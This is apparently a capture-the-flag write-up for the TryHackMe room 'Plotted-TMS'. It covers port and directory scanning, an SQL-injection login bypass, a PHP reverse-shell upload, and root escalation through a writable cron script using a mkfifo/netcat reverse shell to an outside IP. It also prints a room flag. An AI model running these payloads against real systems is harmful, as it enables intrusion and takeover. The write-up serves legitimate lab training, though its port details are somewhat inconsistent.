Plotted-TMS is an easy room but Everything here is plotted! Hacking a Traffic Offense Management System.

First let’s scan the IP and find some information to work.

Eumerate , enumerate enumerate
Detect open ports:
nmap -sC -sV plotted.thm
After running nmap we detect three open ports 22-80-445, if you pay atention the port 445 is not a Samba server but an HTTP server running Apache.

At this point we have:
- 1 SSH Server (22)
- 2 HTTP Servers (80-445)
Both webservers show the Apache default webpage, its time to enumerate the webserver and find some juice.
Find folders and files on Webservers
dirb http://plotted.thm

Port 80 has nothing, you can check on next image.

We have another port to investigate, port 445.
dirb http://plotted.thm:445

firefox http://plotted.thm:445/management

Great we found a Traffic Offense Management System webapp to investigate and a link to the login system.

Great we have a PHP login page, here I ‘ve try the common admin:admin but it fails. So its time to sqli, after a few manually tests I am In!
admin' or 1+1--'

Cheking the profile page is possible to upload a profile image, or maybe a reverse shell? 😀
Learn how to generate metasploit payloads!

You can use sqlmap the usename parameter is vulnerable.

Upload a PHP reverse shell into profile picture and open a netcat listener on port 1234, open the image and you have a shell.
Here I describe two options, using netcat or msfconsole, usually I use msfconsole to be able to execute other procedures on the remote system and to be more easy to upgrade to a metrepeter shell.
msfconsole -q -x "use multi/handler; set payload generic/shell_reverse_tcp; set lhost 10.8.154.49; set lport 1234; exploit"
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set lhost 10.10.181.46
lhost => 10.10.181.46
msf5 exploit(multi/handler) > set lport 1234
lport => 1234
msf5 exploit(multi/handler) > run
firefox http://10.10.114.80:445/management/uploads/1645711140_rshell.php

nc -lnp 1234

Stabilize the shell:
python3 -c "import pty;pty.spawn('/bin/bash')"

export TERM=xterm
Now is time to escalate our priviliges, I will run Linpeas and check the output


And lianpeas found our entry point, a cron job running a script as plot_admin.

Lets verify our permissions on that folder.
ls -la /var/www/
The scripts folder is owned by our user/group and is great we can create stuff inside or manipulate whats inside.

ls -la /var/www/scripts

As we can see we have a script owned by user plot_admin.
Let’s think a little bit.
We are the owners of a folder and someone create a script inside – do we have a permissions to write into that script?
Check the cronjob output it tell us it will be running as plot_admin user. So?
If we change the content of the script to a bash reverse shell it will be executed as plot_admin user.
Let’s see!

mv /var/www/scripts/backup.sh /var/www/scripts/backup_rfs.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.44.169 4444>/tmp/f
nc -lp 1234
chmod 777 /var/www/scripts/backup.sh

cat /home/plot_admin/user.txt
TryHackMe Plotted-TMS PWNED

doas -u root openssl enc -in /root/root.txt
doas -u root openssl enc -in /root/root.txt
Congratulations on completing this room!
53f85e-RFS-040a9bdcab
Hope you enjoyed the journey!
Do let me know if you have any ideas/suggestions for future rooms.
-sa.infinity8888